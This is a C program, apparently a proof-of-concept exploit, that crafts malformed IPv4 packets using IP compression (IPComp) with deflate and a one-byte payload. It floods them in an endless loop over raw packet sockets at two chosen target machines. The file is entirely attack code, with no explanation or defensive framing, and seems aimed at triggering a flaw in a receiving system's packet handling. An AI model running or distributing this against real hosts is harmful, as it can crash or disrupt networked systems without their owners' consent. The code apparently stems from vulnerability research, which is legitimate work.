#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <err.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <string.h>
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <endian.h>
#include <stddef.h>
#include <netinet/udp.h>

struct ipcomp_hdr {
	uint8_t next_proto;
	uint8_t reserved;
	uint16_t cpi;
} __attribute__((__packed__));
struct deflate_stored_hdr {
	uint8_t type;
	uint16_t len;
	uint16_t len_inverted;
} __attribute__((__packed__));
#define IPCOMP_DEFLATE 2
#define IPCOMP_HEADER_COUNT 100

unsigned char parse_hexdigit(char c) {
	if (c >= '0' && c <= '9') return c - '0';
	if (c >= 'a' && c <= 'f') return c - 'a' + 10;
	errx(1, "invalid hex digit: '%c'", c);
}

void parse_mac(unsigned char *out, char *p) {
	for (int i=0; 1; i++) {
		unsigned char high = parse_hexdigit(*(p++));
		unsigned char low = parse_hexdigit(*(p++));
		*(out++) = (high << 4) | low;
		if (i == 5) break;
		if (*(p++) != ':') errx(1, "expected ':'");
	}
}

unsigned short ip_checksum(void *buf, int len) {
	int count = len;
	unsigned int res = 0;
	while (count > 1) {
		res += *(unsigned short*)buf;
		buf += 2;
		count -= 2;
	}
	if (count > 0) res += *(unsigned char*)buf;
	while (res >> 16) res = (res & 0xffff) + (res >> 16);
	return ~res;
}

int main(int argc, char **argv) {
	if (argc != 9) {
		printf("usage: %s <if1> <target_mac1> <src_ip1> <dst_ip1> <if2> <target_mac2> <src_ip2> <dst_ip2>\n", argv[0]);
		return 1;
	}

	char *if_name = argv[1];
	char *target_mac = argv[2];
	char *src_ip = argv[3];
	char *dst_ip = argv[4];
	char *if_name2 = argv[5];
	char *target_mac2 = argv[6];
	char *src_ip2 = argv[7];
	char *dst_ip2 = argv[8];

	int s = socket(AF_PACKET, SOCK_DGRAM, 0);
	if (s == -1) err(1, "packet socket");

	struct ifreq ifr;
	strcpy(ifr.ifr_name, if_name);
	if (ioctl(s, SIOCGIFINDEX, &ifr)) err(1, "lookup interface");
	int ifindex = ifr.ifr_ifindex;
	strcpy(ifr.ifr_name, if_name2);
	if (ioctl(s, SIOCGIFINDEX, &ifr)) err(1, "lookup interface");
	int ifindex2 = ifr.ifr_ifindex;

	struct sockaddr_ll addr = {
		.sll_family = AF_PACKET,
		.sll_protocol = htons(ETH_P_IP),
		.sll_ifindex = ifindex,
		.sll_halen = 6
	};
	parse_mac(addr.sll_addr, target_mac);

	struct sockaddr_ll addr2 = {
		.sll_family = AF_PACKET,
		.sll_protocol = htons(ETH_P_IP),
		.sll_ifindex = ifindex2,
		.sll_halen = 6
	};
	parse_mac(addr2.sll_addr, target_mac2);

	struct packet {
		struct iphdr iph;
		struct ipcomp_hdr ipcomp;
		char buf[1];
	} __attribute__((__packed__)) packet = {
		.iph = {
			.ihl = 5,
			.version = 4,
			.tot_len = htons(sizeof(packet)),
			.protocol = IPPROTO_COMP,
			.check = 0, /* requires fixup */
			.saddr = 0, /* requires fixup */
			.daddr = 0 /* requires fixup */
		},
		.ipcomp = {
			.next_proto = IPPROTO_UDP,
			.reserved = 0,
			.cpi = htons(IPCOMP_DEFLATE)
		}
	};
	struct packet packet2 = packet;

	if (inet_pton(AF_INET, src_ip, &packet.iph.saddr) != 1) errx(1, "inet_pton");
	if (inet_pton(AF_INET, dst_ip, &packet.iph.daddr) != 1) errx(1, "inet_pton");
	packet.iph.check = ip_checksum(&packet.iph, sizeof(packet.iph));

	if (inet_pton(AF_INET, src_ip2, &packet2.iph.saddr) != 1) errx(1, "inet_pton");
	if (inet_pton(AF_INET, dst_ip2, &packet2.iph.daddr) != 1) errx(1, "inet_pton");
	packet2.iph.check = ip_checksum(&packet2.iph, sizeof(packet2.iph));

	while (1) {
		if (sendto(s, &packet, sizeof(packet), 0, (struct sockaddr *)&addr, sizeof(addr)) != sizeof(packet))
			perror("sendto 1");
		if (sendto(s, &packet2, sizeof(packet2), 0, (struct sockaddr *)&addr2, sizeof(addr2)) != sizeof(packet2))
			perror("sendto 2");
	}
}
